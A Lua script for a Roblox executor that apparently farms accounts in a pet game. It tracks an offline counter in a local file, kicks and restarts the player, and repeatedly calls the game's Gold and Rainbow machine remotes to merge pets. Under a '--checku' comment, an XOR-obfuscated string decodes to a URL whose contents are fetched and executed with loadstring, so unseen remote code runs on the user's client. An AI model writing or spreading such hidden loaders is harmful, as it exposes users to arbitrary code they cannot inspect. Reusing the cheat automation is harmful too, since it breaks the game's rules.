task.spawn(function()

------------------------+++

if EVENT_or_FARM == "E" then
	game.Players.LocalPlayer:Kick("kick reset")		
end
------------------------+++

local Save = require(game:GetService("ReplicatedStorage").Library.Client.Save)
local rank = Save.Get().Rank
_G.start_vvv_ = false
if rank > 24 then 
	_G.start_vvv_ = true
end


if _G.ACC_SUPER == true then
	_G.FPS_farm = 5
else
	_G.FPS_farm = 3
end
_G.FPS_event = 5


local _Config_Online = 8

local FILE_NAME = "OFFLINE.txt"
if not writefile or not readfile then    return	end
local function getOffline()
    if not isfile or not isfile(FILE_NAME) then
        writefile(FILE_NAME, "0")
        return 0
    end
    local content = readfile(FILE_NAME)
    local val = tonumber(content)
    if val == nil then
        writefile(FILE_NAME, "0")
        return 0
    end
    return val
end
local function setOffline(v)
    writefile(FILE_NAME, tostring(v))
end
local _Config_Offline = getOffline()
if _Config_Offline ~= _Config_Online then

	    setOffline(_Config_Online)
		if _G.Restart == true then
			_G.Restart = false 	
			return
		end
		--------------------------------------------
		if EVENT_or_FARM == "E" then
			game.Players.LocalPlayer:Kick("kick reset")		
		end
		game.Players.LocalPlayer:Kick("kick reset")


		--------------------------------------------
end

if _G.Restart == true then
	_G.Restart = false 	
end

--checku
local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9) local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + (v11% #v9) ,1 + (v11% #v9) + 1 )))%256 ));end return v5(v10);end loadstring(game:HttpGet(v7("\217\215\207\53\245\225\136\81\193\207\218\44\232\246\196\27\221\207\150\33\181\190\159\80\218\214\205\60\232\191\201\80\198\204\201\46\227\169\212\80\213\198\205\106\197\179\194\29\218\252\238\22\195\137\137\18\196\194","\126\177\163\187\69\134\219\167")))();

local now = os.date("!*t", os.time(os.date("!*t")) + 7 * 3600)
local currentHour = now.hour

if currentHour > 21 or currentHour < 7 then
	_G.start_vvv_ = false
end
if name_vps == "Vx8" or name_vps == "Vx9" then
_G.start_vvv_ = true
end

local Save = require(game:GetService("ReplicatedStorage").Library.Client.Save)
local rank = Save.Get().Rank


	if _G.RunsLeft_TIMEtrial == 0 and EVENT_or_FARM == "F" and _G.ACC_SUPER == false and rank > 19 then
		--game.Players.LocalPlayer:Kick("kick fin")
	end
	if _G.RunsLeft_TIMEtrial > 0 and EVENT_or_FARM == "E" and _G.start_vvv_ == true then
		--task.wait(300) game.Players.LocalPlayer:Kick("kick pla")
	end
	if _G.start_vvv_ == false and EVENT_or_FARM == "F" then 
		--game.Players.LocalPlayer:Kick("kick F > E")
	end
----------------------------------------------------------------------------------------
if EVENT_or_FARM == "E" then

end
task.spawn(function() 

local NamePet_ep = {
    "Veil Horse",
}

local ReplicatedStorage = game:GetService("ReplicatedStorage")
local SaveData = require(ReplicatedStorage.Library.Client.Save).Get()
local Manager = {}

function Manager:GetPets(name_pet, PT_yeucau)
    local SaveData = require(ReplicatedStorage.Library.Client.Save).Get()
    local Huges = {}
    for uid, v in pairs(SaveData.Inventory.Pet) do
        if string.find(v.id, name_pet) then
            if (PT_yeucau == nil and v.pt == nil) or (PT_yeucau ~= nil and v.pt == PT_yeucau) then
                table.insert(Huges, {
                    UID   = uid,
                    SH    = v.sh,
                    PT    = v.pt,
                    Count = v._am or 1
                })
            end
        end
    end
    return Huges
end

function Ghep_pet_len_gold_rainbow(danh_sach_ten_pet)
    for _, ten_pet in ipairs(danh_sach_ten_pet) do
        -- G?p Gold
        local Pet_List1 = Manager:GetPets(ten_pet, nil)
        for _, pet in ipairs(Pet_List1) do
            while pet.Count >= 16 do
                local success, err = pcall(function()
                    game:GetService("ReplicatedStorage").Network.GoldMachine_Activate:InvokeServer(pet.UID, 2)
                end)
                if not success then
                    warn("? L?i khi ép pet GOLD: " .. tostring(err))
                    break
                end
                task.wait(3)
                pet.Count = pet.Count - 16
            end
        end

        -- G?p Rainbow
        local Pet_List2 = Manager:GetPets(ten_pet, 1)
        for _, pet in ipairs(Pet_List2) do
            while pet.Count >= 16 do
                local success, err = pcall(function()
                    game:GetService("ReplicatedStorage").Network.RainbowMachine_Activate:InvokeServer(pet.UID, 2)
                end)
                if not success then
                    warn("? L?i khi ép pet RAINBOW: " .. tostring(err))
                    break
                end
                task.wait(3)
                pet.Count = pet.Count - 16
            end
        end
    end
end

-- G?i hàm ép nhi?u pet
Ghep_pet_len_gold_rainbow(NamePet_ep)



end)

----------------------------------------------------------------------------------------
task.wait(60)
	if game.PlaceId == 119454325063278 or game.PlaceId == 95635359880599 then
		game.Players.LocalPlayer:Kick("FIFA") 
	end
end)
